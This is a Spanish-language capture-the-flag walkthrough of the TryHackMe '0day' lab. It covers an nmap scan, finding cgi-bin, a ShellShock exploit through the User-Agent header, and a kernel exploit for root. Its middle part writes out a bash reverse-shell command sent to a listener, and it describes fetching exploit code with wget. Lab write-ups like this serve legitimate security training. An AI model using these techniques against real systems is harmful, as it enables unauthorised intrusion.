RODGAR
  • Whoami
  • ACTIVE DIRECTORY
    • HackTheBox Scrambled
    • HackTheBox Forest
    • HackTheBox Escape
    • HackTheBox Authority
    • HackTheBox Support
    • HackTheBox Return
    • HackTheBox Timelapse
    • HackTheBox Administrator
    • HackTheBox Cicada
    • ⛔HackTheBox Vintage
    • HackTheBox Sauna
    • HackTheBox Active
  • CTF WRITEUP's
    • TryHackme
      • TryHackme 0day
      • TryHackme Daily Bugle
      • TryHackme Blog
      • TryHackme Year of the Owl
      • TryHackme Wgel CTF
      • TryHackme Chill Hack
      • TryHackme Wonderland
      • TryHackne OhSINT
      • TryHackme Cold VVars
      • TryHackme Dav
      • TryHackme RootMe
      • TryHackMe Basic Pentesting
      • TryHackMe Simple-CTF
      • TryHackMe Vulnversity
      • Tryhackme Kenobi
    • Burp Suite
      • 1️⃣SQL Ijections
        • Laboratorio Uno
        • Laboratorio Dos
        • Laboratorio Tres
        • Laboratorio Cuatro
        • Laboratorio Cinco
        • Laboratorio Seis
        • Laboratorio Siete
    • VulnHub
      • Inferno
      • Election
      • SYMFONOS 3
      • SYMFONOS 2
      • DJinn-3
      • Durian 1
      • DarkHole 2
      • OffSec DC-9
      • OffSec Potato
      • OffSec Pwned1
      • OffSec VIKINGS
      • OffSec Tre
      • OffSec MoneyBox
      • OffSec DEATHNOTE
      • OffSec Gaara
      • OffSec NoName
      • OffSec Katana
      • OffSec Sick0s
    • The Hackers Labs
      • The Hackers Labs Offensive
      • The Hackers Labs Resident
      • The Hacker Labs Base
      • The Hackers Labs Statue
      • The Hackers Labs Luna
      • The Hackers Labs Templo
      • The Hackers Labs GOIKO
      • The Hackers Labs Microsoft
    • Hackmyvm
      • Hackmyvm UP
    • Pivoting
      • Pivoting
      • Internal TryHackme
      • Basic /Doctor
      • Pluck /Brain
  • Privilege escalation
    • Abuso de grupos de usuario especiales
      • Docker
      • LXD
      • ADM
    • Abuso de permisos incorrectamente implementados
    • Detección y explotación de Capabilities
    • Tareas Crom
    • Path Hijacking
    • Abusando de privilegios a nivel de Sudoers
    • Abusando de privilegios SUID
    • Linux Privilege Escalation
  • Shared Files
    • Share Windows Linux
      • Compartir de entre Windows y Linux
      • Compartir de Windows a linux [Impacket-Server]
    • Share Linux
      • Compartir de linux en [PHP]
  • OWASP TOP 10
    • SQL Injections
    • XSS
    • XXE
    • Path traversal Lab
    • LFI con Wrappers
    • Log Poisoning (LFI -> RCE)
    • Server-Side Template Injection (SSTI)
    • Ataque de oráculo de relleno (Padding Oracle)
    • Inyecciones LaTeX
    • Ataques de transferencia de zona (AXFR – Full Zone Transfer)
    • Enumeración y explotación de WebDAV
    • ShellShock
    • Enumeración y explotación de SQUID Proxies
    • Insecure Direct Object Reference (IDORs)
    • Json Web Token
    • Intercambio de recursos de origen cruzado (CORS)
    • Abuso de subidas de archivos
      • Laboratorio 1
      • Laboratorio 2
      • Laboratorio 3
      • Laboratorio 4
      • Laboratorio 5
      • Laboratorio 6
      • Laboratorio 7
      • Laboratorio 8
      • Laboratorio 9
  • Group 1
    • Recursos
Con tecnología de GitBook
En esta página
  • Wfuzz
  • Escalada de Privilegios
  1. CTF WRITEUP's
  2. TryHackme

TryHackme 0day

AnteriorTryHackmeSiguienteTryHackme Daily Bugle

Última actualización hace 22 días

Hoy vamos a resolver la maquina 0day, es una maquina bonita de dificultad media muy sencilla.

Vamos por lo basico ya se la saben, Nmap para ver los puertos que estan abiertos.

# Nmap 7.94SVN scan initiated Sun Dec 10 15:01:08 2023 as: nmap -sCV -p22,80 -oN target.txt 10.10.248.240
Nmap scan report for 10.10.248.240
Host is up (0.062s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: 0day
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 10 15:01:18 2023 -- 1 IP address (1 host up) scanned in 9.61 seconds

Ahora igualmente usando Nmap lo lanzamos para ver que versiones y servicios corren para estos puertos.

Si vamos al puerto 80 donde esta la web este es lo que observamos nada util.

Wfuzz

Ahora haciendo uso de Wfuzz vamos a enumerar directorios ocultos dentro de la maquina el cual nos encontramos con varios pero el que nos interesa es cgi-bin.

Ya que la maquina es vulnerable a un ShellShock y nos aprovecharemos de este directorio.

Y bueno de esta forma se explota un ShellShock el payload lo metemos en el User-Agent, observamos que podemos leer el /etc/passwd de la maquina, nos interpreta los comando es decir que podemos ganar acceso.

Ahora ganamos acceso en el User-Agent ponemos el tipica cadena de bash -i >& /dev/tcp/IP/Port 0>&1.

En la parte de abajo nos ponemos en escucha con Netcat y observamos que ganamos acceso como el usuario www-data.

Capturamos nuestra primera bandera la de user.txt.

Escalada de Privilegios

Wachamos el kernel del ubuntu el cual es un 14.04 que es vulnerable a una escalada de privilegios.

Busca el exploit usando searchsploit ubuntu 14.04 y te descargas este exploit que esta hecho en C con este numero de identificado 37292.

  • Ahora en en nuestra maquina en local nos compartimos un servidor con python.

  • Como punto numero dos desde la maquina victima usando wget nos descargamos el .C.

Le cambiamos el nombre a ofs.c, pero si lo intentamos ejecutar como dice en el Poc del exploit nos dice No such file or directory en español No existe tal archivo o directorio, esto se refiere al compilador gcc.

La ruta de gcc es /usr/bin/gcc. Pero podemos manipular el PATH para que la ruta empieze donde nosotros queramos.

  • Si hacemos un echo $PATH. Observamos que el PATH inicia en /usr/local/bin.

  • Pero si hacemos un export PATH=/tmp:$PATH y volvemos a hacer un echo $PATH.

  • Observamos que el PATH ahora inicia donde nostros lo hemos definido en el directorio /tmp.

Ahora si seguimos el Poc que nos daban en el exploit y ejecutamos, observamos que nos convertimos en root, y bueno capturamos nuestra ultima bandera la de root.txt. Y bueno MAQUINA RESUELTA